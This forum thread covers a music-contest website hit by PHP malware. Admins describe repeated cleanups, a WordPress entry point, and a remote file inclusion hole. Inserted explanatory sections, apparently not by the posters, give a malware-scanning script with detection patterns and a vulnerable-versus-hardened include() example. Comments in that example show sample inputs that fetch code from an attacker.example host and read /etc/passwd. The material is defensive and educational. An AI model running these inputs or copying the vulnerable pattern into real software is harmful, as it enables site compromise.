Bug?
- Spintown
- Push Comes to Shove
- Posts: 399
- Joined: Fri Oct 02, 2009 9:27 pm
- Submitting as: Spintown & Company
- Pronouns: he/him
- Contact:
Bug?
For a few days I couldn't visit the Song Fight home page without something attacking my computer. Seems to be better now, but it still does it when I try to view the results from the last fight. I don't see anyone else mentioning it in here, so was it just me having problems?
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
"Without something attacking my computer" is a liiiiiiiiitle bit vague. Could you try posting a screenshot of what's happening, and maybe the page source?
- JonPorobil
- Beat It
- Posts: 5682
- Joined: Sat Sep 25, 2004 11:45 am
- Instruments: Piano, Guitar, Harmonica, Mandolin, Accordion, Bass, lots of VSTs
- Recording Method: Cubase 10.5
- Submitting as: Jon Eric, Jon Porobil, others
- Pronouns: He/Him
- Location: Pittsburgh, PA
- Contact:
Re: Bug?
Actually, Spud was just in the IRC room talking about a malware notice he got yesterday. So this is likely a known issue. Still, a little more specificity couldn't hurt.
"Warren Zevon would be proud." -Reve Mosquito
Stages, an album of about dealing with loss, anxiety, and grieving a difficult year, now available on Bandcamp and all streaming platforms! https://jonporobil.bandcamp.com/album/stages
-
- A New Player
- Posts: 10
- Joined: Mon Sep 06, 2010 11:50 am
- Instruments: Saxophone, Keyboards
- Recording Method: Sonar 8
- Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
- Location: San Jose, Ca
Re: Bug?
I just got the malware, fake antivirus thing again at 2:23 pm. It happened when I clicked on the Beaten Man link under last week's fight. I also received it this morning when I voted.
- Paul
- Spud
- Hot for Teacher
- Posts: 4770
- Joined: Fri Sep 24, 2004 10:25 am
- Instruments: Bass, Keyboards, eHorn
- Submitting as: Octothorpe
- Location: Seattle
- Contact:
Re: Bug?
Sorry, I was under the mistaken impression that JB had done something besides change the passwords. I have cleaned up the code tonight. Please continue to post notices of any further problems.
SPUD
-
- A New Player
- Posts: 10
- Joined: Mon Sep 06, 2010 11:50 am
- Instruments: Saxophone, Keyboards
- Recording Method: Sonar 8
- Submitting as: Cannibal Parrot, Berkeley Social Scene (during the summers)
- Location: San Jose, Ca
Re: Bug?
Ugh, it just happened again. This time, when I went to the main Songfight.org page.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Spud, it would be really helpful if I could get server access again so that I can diagnose how this exploit apparently keeps happening.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
If you're running WordPress, PLEASE PLEASE PLEASE make sure that you're running the latest version of that insecure festering shitpile, because there are some pretty widespread massive exploits going on against it right now. http://blog.sucuri.net/2011/04/mass-inf ... g-com.html has a bit more information.
- ken
- Hot for Teacher
- Posts: 3870
- Joined: Sat Sep 25, 2004 6:10 pm
- Instruments: Guitar, bass, drums, keys
- Recording Method: MOTU 828x, Cubase 10
- Submitting as: Ken's Super Duper Band 'n Stuff
- Pronouns: he/him
- Location: oakland, ca
- Contact:
Re: Bug?
HUZZAH!!!

fluffy wrote:
I found a few insidiously well-hidden things that were continuously reinfecting the whole site. They should all be gone now. It also looks like the original exploit was installed via WordPress (songfight.net/blog), which I have now disabled as well. (The server logs indicate that nobody has gained unauthorized login/admin access to the actual hosting account.)
Ken's Super Duper Band 'n Stuff - Berkeley Social Scene - Tiny Robots - Seamus Collective - Semolina Pilchards - Cutie Pies - Explino! - Bravo Bros. - 2 from 14 - and more!
i would just like to remind everyone that Ken eats kittens - blue lang
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
What, did something happen again? I thought I'd cleaned up everything and disabled the obvious points of infection.
- Spud
- Hot for Teacher
- Posts: 4770
- Joined: Fri Sep 24, 2004 10:25 am
- Instruments: Bass, Keyboards, eHorn
- Submitting as: Octothorpe
- Location: Seattle
- Contact:
Re: Bug?
Yes, pretty much every PHP file was infected. Linked or not, in use or not. HTML was fine. I just cleaned up again. Will continue to monitor.
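Since the infection touched every PHP file on disk whether or not a page linked to it, the useful check is a walk over the whole web root rather than a look at the pages that visibly misbehave. The script below is an added example, not Song Fight's own code or anything from the thread: it lists every .php file that was modified after a cutoff or that contains idioms typical of injected, obfuscated code. The marker patterns are assumptions about what such injections commonly look like (the thread never says what the actual payload was), and the sample site it scans is constructed inline so it runs offline.

```php
<?php
// Added example (not Song Fight's code): find PHP files under a web root that
// were modified recently or contain markers commonly seen in injected code.
// The marker patterns and the sample files are assumptions/constructed data.

function scan_php_files(string $root, int $modifiedSince, array $patterns): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        // "Linked or not, in use or not": walk every .php file on disk,
        // not just the ones reachable from the site's pages.
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        $reasons = [];
        if ($file->getMTime() >= $modifiedSince) {
            $reasons[] = 'mtime ' . date('c', $file->getMTime());
        }
        $src = file_get_contents($path);
        foreach ($patterns as $name => $regex) {
            if (preg_match($regex, $src)) {
                $reasons[] = $name;
            }
        }
        if ($reasons) {
            $hits[$path] = $reasons;
        }
    }
    ksort($hits);
    return $hits;
}

// Assumed markers: obfuscation idioms that rarely appear in hand-written site code.
$patterns = [
    'eval+decode'    => '/eval\s*\(\s*(gz(inflate|uncompress)|str_rot13|base64_decode)\s*\(/i',
    'preg_replace/e' => '/preg_replace\s*\(\s*[\'"][^\'"]*\/[a-z]*e[a-z]*[\'"]/i',
    'hex-escaped'    => '/(\\\\x[0-9a-f]{2}){8,}/i',
    'hidden-iframe'  => '/<iframe[^>]+(display\s*:\s*none|width\s*=\s*["\']?0)/i',
];

// Constructed sample site: one clean, untouched file and one freshly injected one.
$root = sys_get_temp_dir() . '/sfscan_' . getmypid();
mkdir("$root/inc", 0700, true);
file_put_contents("$root/clean.php", "<?php echo 'hello'; ?>\n");
file_put_contents("$root/inc/songpage.php",
    "<?php eval(base64_decode('" . base64_encode("echo 'injected';") . "')); ?>\n");
touch("$root/clean.php", time() - 86400 * 365); // last changed a year ago
touch("$root/inc/songpage.php", time());        // changed just now

$hits = scan_php_files($root, time() - 86400 * 7, $patterns);
foreach ($hits as $path => $reasons) {
    echo $path, ': ', implode(', ', $reasons), "\n";
}

// Remove the constructed sample.
unlink("$root/inc/songpage.php");
unlink("$root/clean.php");
rmdir("$root/inc");
rmdir($root);
```

Two caveats when running something like this on a real host: compare against a known-good copy of the site (a version-controlled checkout or a pre-incident backup) rather than trusting mtime, since a modified file can have its timestamp reset, and treat the pattern list as a starting point, not proof of cleanliness. Anything that regenerates the infection (a cron job, a writable upload directory, a second compromised application on the same account) has to be found and closed or the files come back, which is what the thread describes.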
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
fucking hell. must have been another infection I missed. The malware was VERY good at hiding itself, and I thought I found all the places it was coming up.
What was it infected with?
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Found a pretty big security hole in songpage and artistpage which is being actively exploited by people. As always it's one of those things that PHP makes WAY too easy to fuck up on. Will put in a fix ASAP.
- fluffy
- Eruption
- Posts: 11029
- Joined: Sat Sep 25, 2004 10:56 am
- Instruments: sometimes
- Recording Method: Logic Pro X
- Submitting as: Sockpuppet
- Pronouns: she/they
- Location: Seattle-ish
- Contact:
Re: Bug?
Well, the main thing is something everyone should know about: include() and fopen() can both take arbitrary URLs as parameters, unless it's explicitly disabled in php.ini. Stupidest language "feature" EVER. My fix was to abort if it detects a :// in a key parameter.
I've audited all of the site-specific PHP and I think I fixed all the places where that could happen, but of course there's always the possibility of other stuff like that.
PHP really is a shitty language from a writing-secure-apps standpoint. Although I'd like to point out that if Songfight were database-driven rather than file-driven, it would be a lot easier to write code in a more secure way. Direct filesystem access is bad news in PHP.
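The hole described in the two posts above, a songpage/artistpage parameter reaching include(), is remote file inclusion. The code below is an added example, not Song Fight's actual songpage.php or the fix fluffy deployed: it shows a minimal vulnerable handler next to a hardened one. The parameter name "song", the data directory layout and the sample song file are assumptions made so the example runs offline.

```php
<?php
// Added example, not Song Fight's own code. Shows the class of bug discussed
// above: include() fed a request-controlled string. With allow_url_include on
// (and, for fopen(), allow_url_fopen), the request can name a URL instead of a
// file. The "song" parameter, data directory and sample file are assumptions.

// VULNERABLE (before): the request decides what gets included.
//   songpage.php?song=http://attacker.example/payload.txt?   -> remote code execution
//   songpage.php?song=../../../../etc/passwd%00              -> local file read (PHP < 5.3.4)
function songpage_vulnerable(string $song): string
{
    ob_start();
    include 'data/' . $song . '.php';
    return ob_get_clean();
}

// HARDENED: never hand request data to include() directly. Accept only a
// plain slug, resolve it against a fixed directory, and confirm the resolved
// path is still inside that directory.
function safe_song_path(string $dataDir, string $song): ?string
{
    // A song key is a slug; "://", "/", "\", NUL bytes and ".." all fail here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $song)) {
        return null;
    }
    $base = realpath($dataDir);
    $path = realpath($dataDir . DIRECTORY_SEPARATOR . $song . '.php');
    // realpath() returns false for missing files and follows symlinks, so the
    // prefix check catches a symlink that points out of the data directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function songpage_hardened(string $dataDir, string $song): string
{
    $path = safe_song_path($dataDir, $song);
    if ($path === null) {
        return 'no such song';
    }
    ob_start();
    include $path;
    return ob_get_clean();
}

// Constructed demo data so this runs offline.
$dataDir = sys_get_temp_dir() . '/sf_songs_' . getmypid();
mkdir($dataDir, 0700);
file_put_contents("$dataDir/beaten-man.php", "<?php echo 'Beaten Man results'; ?>");

$probes = ['beaten-man', 'http://attacker.example/p', '../../etc/passwd', "beaten-man\0"];
foreach ($probes as $q) {
    $p = safe_song_path($dataDir, $q);
    printf("%-28s -> %s\n", addcslashes($q, "\0"), $p === null ? 'REJECTED' : basename($p));
}
echo songpage_hardened($dataDir, 'beaten-man'), "\n";

unlink("$dataDir/beaten-man.php");
rmdir($dataDir);
```

An allowlist on the key, as above, covers both the URL case and ".." traversal in one check, which a test for "://" alone does not. Independently of the code, the php.ini side is worth pinning down: allow_url_include has defaulted to Off since PHP 5.2, but allow_url_fopen defaults to On, so set both to Off explicitly on any host that does not need to open remote URLs from PHP, and keep the web server's write access limited to the directories that genuinely need it so a single bug cannot rewrite every .php file on the account.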